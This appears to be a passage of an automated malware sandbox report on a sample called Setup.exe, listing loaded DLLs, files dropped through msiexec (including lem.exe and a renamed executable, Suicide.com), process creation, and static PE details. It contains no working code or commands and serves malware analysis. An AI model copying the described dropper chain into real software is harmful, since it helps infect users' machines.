Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA1F4.tmp	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA1F4.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA1F4.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA1F4.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA1F4.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA1F4.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: YouTube.lnk.23.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.23.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.23.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.23.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.23.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.23.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install
Source: C:\Windows\SysWOW64\tasklist.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\tasklist.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\tasklist.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Setup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Setup.exe

Static file information: File size 7492602 > 1048576

Source: Setup.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c6000

Source: Setup.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Setup.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Setup.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Setup.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Setup.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Setup.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Setup.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: Setup.exe, 00000000.00000003.2031159892.00000000083C0000.00000004.00000020.00020000.00000000.sdmp, shi732E.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSIA1F4.tmp, 00000007.00000002.2152768418.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, MSIA1F4.tmp, 00000007.00000000.2151166804.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, Setup.msi.0.dr, MSIA0BB.tmp.2.dr, 559dea.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Setup.exe, Setup.msi.0.dr, MSIA03D.tmp.2.dr, 559dea.msi.2.dr
Source:	Binary string: wininet.pdbUGP source: Setup.exe, 00000000.00000003.2031159892.00000000083C0000.00000004.00000020.00020000.00000000.sdmp, shi732E.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Setup.exe, Setup.msi.0.dr, 559dea.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.exe, MSI744A.tmp.0.dr, MSI9FAE.tmp.2.dr, MSI7B91.tmp.4.dr, MSI73BC.tmp.0.dr, Setup.msi.0.dr, MSI7489.tmp.0.dr, MSI7B61.tmp.4.dr, MSI9FFD.tmp.2.dr, 559dea.msi.2.dr, MSI7A65.tmp.4.dr, MSI7A95.tmp.4.dr, MSI7580.tmp.4.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Setup.exe
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSIA1F4.tmp, 00000007.00000002.2152768418.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, MSIA1F4.tmp, 00000007.00000000.2151166804.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, Setup.msi.0.dr, MSIA0BB.tmp.2.dr, 559dea.msi.2.dr

Source: Setup.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Setup.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Setup.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Setup.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Setup.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: shi732E.tmp.0.dr

Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_008481D0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_008481D0

Source: Setup.exe	Static PE information: real checksum: 0x3f9b64 should be: 0x72cea8
Source: lem.exe.8.dr	Static PE information: real checksum: 0x1208a0 should be: 0x12bf72
Source: lem[1].exe.8.dr	Static PE information: real checksum: 0x1208a0 should be: 0x12bf72

Source: Setup.exe	Static PE information: section name: .didat
Source: Setup.exe	Static PE information: section name: .fptable
Source: shi732E.tmp.0.dr	Static PE information: section name: .wpp_sf
Source: shi732E.tmp.0.dr	Static PE information: section name: .didat
Source: MSI73BC.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI744A.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI7489.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI9F40.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI9FAE.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI9FFD.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA03D.tmp.2.dr	Static PE information: section name: .didat
Source: MSIA03D.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA1F4.tmp.2.dr	Static PE information: section name: .fptable
Source: MSI7A95.tmp.4.dr	Static PE information: section name: .fptable
Source: MSI7B61.tmp.4.dr	Static PE information: section name: .fptable
Source: MSI7B91.tmp.4.dr	Static PE information: section name: .fptable
Source: MSI7580.tmp.4.dr	Static PE information: section name: .fptable
Source: MSI7746.tmp.4.dr	Static PE information: section name: .fptable
Source: MSI77E4.tmp.4.dr	Static PE information: section name: .fptable
Source: MSI7A65.tmp.4.dr	Static PE information: section name: .fptable

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0072289B push 8BFFFFFEh; iretd	0_2_007228AC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_006FF6F0 push ecx; mov dword ptr [esp], ecx	0_2_006FF6F1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00821910 push ecx; mov dword ptr [esp], 3F800000h	0_2_00821A6C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00911F4A push ecx; ret	0_2_00911F5D
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005AA019 push ecx; ret	7_2_005AA02C
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC178FD push rdi; ret	8_2_00007FF79EC17904
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC17399 push rdi; ret	8_2_00007FF79EC173A2

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSIA1F4.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7489.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7A65.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F40.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\Public\Desktop\Setup.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FAE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\MSI73BC.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7A95.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\shi732E.tmp	Jump to dropped file
Source: C:\Users\Public\Desktop\Setup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\lem[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7580.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA03D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI77E4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7746.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\MSI744A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1F4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7B91.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7B61.tmp	Jump to dropped file
Source: C:\Users\Public\Desktop\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\lem.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FFD.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F40.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FAE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA03D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1F4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9FFD.tmp	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC04514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

8_2_00007FF79EC04514

Source: C:\Users\user\AppData\Local\Temp\lem.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
